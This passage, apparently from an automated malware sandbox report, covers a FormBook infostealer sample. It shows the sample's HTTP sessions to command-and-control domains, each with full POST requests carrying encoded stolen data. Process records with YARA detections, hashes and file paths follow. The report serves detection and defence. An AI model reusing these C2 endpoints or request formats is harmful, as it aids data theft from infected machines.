                                                                                                                      41 | 192.168.2.11 | 49752 | 208.91.197.27 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:39.278970957 CET | 734 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hillcresthealth.online
                                                                                                                      Origin: http://www.hillcresthealth.online
                                                                                                                      Referer: http://www.hillcresthealth.online/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=jlEFtH8z8R0pyXMFiO1f5iaiXkcLW9ks1R7iTm1ew1RxWH36UKFiHL8z12Mat840wutyWsg0YvfFhNYkT/dWmUMPrjl1qlg55a09T7EQOJvZxr2mLcX9R51NIHz9iY24WCA0fPoM0PtC/3ak9Fdb5il9Tx8nxIVLmnjTxYzfRKhnCYJABA==


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      42 | 192.168.2.11 | 49753 | 208.91.197.27 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:41.969367027 CET | 754 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hillcresthealth.online
                                                                                                                      Origin: http://www.hillcresthealth.online
                                                                                                                      Referer: http://www.hillcresthealth.online/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=jlEFtH8z8R0pz28Fgtdf8CatLUcLNNkS1R3iTl5OxAJxWiT6Gf5iGL8z9WNSic5ZwuQRWu00YvjFhMokTM1XnEMNmDl3ulg55a09T44uOJHZxbGmL9X8KZ1KPHz9mY28WCBbfKwq0LdC/2qkz2FY2il7NB9E+JIdvHKBkLLvGdY2OtlTG1OnTdIKhWYaDuUh3JjLmJM=


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      43 | 192.168.2.11 | 49754 | 208.91.197.27 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:44.659178972 CET | 1767 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hillcresthealth.online
                                                                                                                      Origin: http://www.hillcresthealth.online
                                                                                                                      Referer: http://www.hillcresthealth.online/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      44 | 192.168.2.11 | 49755 | 208.91.197.27 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:47.345930099 CET | 449 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWtyoxijgasWwkkQ== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.hillcresthealth.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:55:47.871211052 CET | 311 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:47 GMT
                                                                                                                      Server: Apache
                                                                                                                      Set-Cookie: vsid=933vr44950654740901374; expires=Tue, 05-Dec-2028 14:55:47 GMT; Max-Age=157680000; path=/; domain=www.hillcresthealth.online; HttpOnly
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      45 | 192.168.2.11 | 49756 | 144.217.103.3 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:01.888638020 CET | 698 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=iW9gG3QAuaVHIsc8cossbsX5Ch2rcxqXzalnAN5F+Rrr885utk2md3XhCXR2ja2CwgE/Tbs3CcqueNXSl3MiBFEBn5SbRlxKneE0Kcei2OEzmhAbbPv4PhK7OfMo3MYyrCcl8aw0X2y3rsvC0SqeXR+YMe3AwPwDbhhRAO7m5oz2ic17Fw==
                                                                                                                      Dec 7, 2023 15:56:02.235359907 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:00 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      46 | 192.168.2.11 | 49757 | 144.217.103.3 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:04.588737011 CET | 718 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=iW9gG3QAuaVHKMs8PZssXcX6JB2rSRqbzapnAO1V/jPr/YxuumOmY3XhK3Q++q2Jwh4BTa83CcuueP/SlEkhAVEHuZSZPVxKneE0KcbN2OMznRwbbuv7MhK4JfMo8sY2rCcL8fVjX0K3ru3C0G2fZh+aRu2C/N5pUhxAZtPTtPu7upZoCHSzR+eH/7qlKNTkNtvTgQk=
                                                                                                                      Dec 7, 2023 15:56:04.766851902 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:03 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      47 | 192.168.2.11 | 49758 | 144.217.103.3 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:07.635206938 CET | 1731 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:56:07.817433119 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:06 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      48 | 192.168.2.11 | 49759 | 144.217.103.3 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:10.322566032 CET | 437 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPBH0RooK5H1Vl7g== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:56:10.500169992 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:09 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      49 | 192.168.2.11 | 49760 | 103.120.80.111 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:17.762079000 CET | 698 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=RqsFrtXqWIcU7Jq988r+PQSFFHkz+dHAIU9intYbXB/YQIixBISnMtNZ7/8YqGRut5nQGN+Q/xFC4SEODDfAWjqog9mmwifTTUcmfIUmi8dQw6Hz2ZkCy1TbtV1LMaPQ3drnZRBZrTZeH0E0r3VO2I37PdjQCG7Kubx655JDEKHQeYsqtQ==


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      50 | 192.168.2.11 | 49761 | 103.120.80.111 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:20.648746967 CET | 718 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=RqsFrtXqWIcU4oa9w7H+KwSGAHkzlNHEIU5inssLUybYRq6xANmnPtNZwf8ZkmRpt5qzGMCQ/xBC4T0OE0rPUzqq7tmk0ifTTUcmfIpDi91QwK3z34kD+VTUl11LdKPU3dqwZQNzrVVeHx40rmVJ4I3HSNjPHkautpVxrd5DE+WnbNA5qrY9AEKo0ocLc77Wc0/nClQ=


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      51 | 192.168.2.11 | 49762 | 103.120.80.111 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:23.548203945 CET | 1731 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      52 | 192.168.2.11 | 49763 | 103.120.80.111 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:56:26.880600929 CET | 437 | OUT | GET /m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.633922.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:56:30.082143068 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: wts/1.7.0
                                                                                                                      Date: Thu, 07 Dec 2023 14:57:35 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      ETag: "65517fce-1a10"
                                                                                                                      Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>633922.com-(www.west.cn)</title> <meta name="description" content="633922.com," /> <meta name="keywords" content="633922.com," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } html, body { height: 100%; }



                                                                                                                      Target ID:0
                                                                                                                      Start time:15:52:18
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\Desktop\BMhDm7YW62.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\Desktop\BMhDm7YW62.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:407'137 bytes
                                                                                                                      MD5 hash:67C64609C2542690D1D652D085A8F2BF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:15:52:18
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\okawzsv.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\okawzsv.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:203'776 bytes
                                                                                                                      MD5 hash:7673BEFD936A20FA9EB874383DEEDBFF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 65%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:15:52:19
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\okawzsv.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\okawzsv.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:203'776 bytes
                                                                                                                      MD5 hash:7673BEFD936A20FA9EB874383DEEDBFF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:15:52:27
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe"
                                                                                                                      Imagebase:0xbc0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      Target ID:11
                                                                                                                      Start time:15:52:28
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Imagebase:0x830000
                                                                                                                      File size:41'984 bytes
                                                                                                                      MD5 hash:93925D4F55465CFC73C4CDF7F8B1F375
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:13
                                                                                                                      Start time:15:52:40
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe"
                                                                                                                      Imagebase:0xbc0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      Target ID:15
                                                                                                                      Start time:15:52:53
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                      Imagebase:0x7ff6de060000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:15.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:22.7%
